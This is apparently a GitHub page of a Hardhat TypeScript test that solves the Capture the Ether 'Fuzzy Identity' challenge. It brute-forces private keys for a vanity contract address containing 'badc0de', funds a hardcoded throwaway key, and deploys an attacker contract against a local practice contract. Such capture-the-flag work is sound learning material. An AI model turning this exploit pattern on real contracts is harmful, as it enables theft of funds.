generated from nicobevilacqua/hardhat-solidity-typescript-boilerplate
-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathFuzzyIdentityChallenge.test.ts
83 lines (63 loc) · 2.04 KB
/
FuzzyIdentityChallenge.test.ts
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
import { expect } from 'chai';
import { Contract, Wallet } from 'ethers';
import { ethers } from 'hardhat';
import crypto from 'crypto';
const { utils, provider, BigNumber } = ethers;
function getWallet() {
let wallet: Wallet;
let contractAddress;
let counter = 0;
let privateKey;
while (1) {
privateKey = `0x${crypto.randomBytes(32).toString('hex')}`;
wallet = new ethers.Wallet(privateKey);
contractAddress = utils.getContractAddress({
from: wallet.address,
nonce: BigNumber.from('0'), // First deployed contract with this address
});
if (contractAddress.toLowerCase().includes('badc0de')) {
console.log('found', privateKey);
return wallet;
}
counter++;
if (counter % 1000 === 0) {
console.log(`checked ${counter} addresses`);
}
}
}
describe('FuzzyIdentityChallenge', () => {
let target: Contract;
let wallet: Wallet;
before(async () => {
const targetFactory = await ethers.getContractFactory('FuzzyIdentityChallenge');
target = await targetFactory.deploy();
await target.deployed();
console.log('Target deployed to:', target.address);
// const wallet = getWallet();
wallet = new Wallet(
'0xa186be056b9b4eedcdb2fd471ca942e85a5acd7baca4738f145f6a520fc4b10f',
provider
);
});
it('Exploit', async () => {
const [owner] = await ethers.getSigners();
let tx;
console.log('1 - Sending ether to wallet');
tx = await owner.sendTransaction({
to: wallet.address,
value: utils.parseEther('0.1'),
});
await tx.wait();
console.log('2 - Deploying attacker');
const attackerFactory = await ethers.getContractFactory('FuzzyIdentityChallengeAttacker');
const attacker = await attackerFactory.connect(wallet).deploy(target.address);
await attacker.deployed();
console.log('Attacker deployed to:', attacker.address);
console.log('3 - Attacking');
tx = await attacker.attack();
await tx.wait();
});
after(async () => {
expect(await target.isComplete()).to.equal(true);
});
});